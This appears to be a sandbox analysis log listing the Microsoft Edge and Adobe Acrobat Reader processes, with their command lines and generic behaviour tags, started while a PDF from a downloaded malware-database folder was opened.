C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5268,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:82⤵PID:5364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3364,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:82⤵PID:4728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6268,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:12⤵PID:4084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=4792,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:12⤵PID:3128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5136,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=3424 /prefetch:82⤵PID:1436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=es --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6480,i,8537759707636851258,18347433566206934330,262144 --variations-seed-version --mojo-platform-channel-handle=6452 /prefetch:82⤵PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Loads dropped DLL
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:1832 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x30c,0x7ffbe916f208,0x7ffbe916f214,0x7ffbe916f2203⤵PID:2580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=es --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1840,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:33⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:23⤵PID:4048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=es --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2568,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=2716 /prefetch:83⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4364,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:83⤵PID:4372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=es --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4364,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:83⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=es --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4532,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4500 /prefetch:83⤵PID:4576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4384,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4652 /prefetch:83⤵PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4380,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4576 /prefetch:83⤵PID:924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=es --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4600,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4580 /prefetch:83⤵PID:5920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4860,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:83⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4556,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:83⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3356,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4960 /prefetch:83⤵PID:1752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=776,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4956 /prefetch:83⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3404,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4984 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4984,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4900 /prefetch:83⤵PID:5584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4244,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=2904 /prefetch:83⤵PID:2912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4212,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:83⤵PID:1676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3868,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:83⤵PID:1412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4916,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=3928 /prefetch:83⤵PID:2756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=es --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4084,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=3144 /prefetch:83⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:83⤵PID:6056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4132,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:83⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4928,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=3192 /prefetch:13⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=3932,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=4304 /prefetch:13⤵PID:2412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=es --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5356,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:83⤵PID:5872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=es --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5376,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:83⤵PID:4972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5776,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:13⤵PID:1380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=es --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=5820,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:13⤵PID:2240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=es --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,14884492233582636820,7444279754448681096,262144 --variations-seed-version --mojo-platform-channel-handle=6436 /prefetch:83⤵PID:692
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:3688
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2284
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:3004
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:560
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\README.txt1⤵PID:5228
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\MalwareDatabase-master\MalwareDatabase-master\davepl\SoftwareOnlineComplaint.pdf"1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2780 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- System Location Discovery: System Language Discovery
PID:3196 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=64ED1299AC88C6BB19776718E0DD4C62 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=64ED1299AC88C6BB19776718E0DD4C62 --renderer-client-id=2 --mojo-platform-channel-handle=1772 --allow-no-sandbox-job /prefetch:13⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=ED2911C5D3FED757DADDDC96FEB3B350 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=64928DE4D3A74BA9EF53EDC47D4F9018 --mojo-platform-channel-handle=2356 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:524
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1C5BDF3F6A12E4305A5413B1E75231A2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1C5BDF3F6A12E4305A5413B1E75231A2 --renderer-client-id=5 --mojo-platform-channel-handle=2384 --allow-no-sandbox-job /prefetch:13⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=88BBCED817163D171741E6C7873D542E --mojo-platform-channel-handle=2772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:240
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1EC6D786FAE417B7A5627EE9F1433346 --mojo-platform-channel-handle=2736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵
- System Location Discovery: System Language Discovery
PID:2760
-
-
-
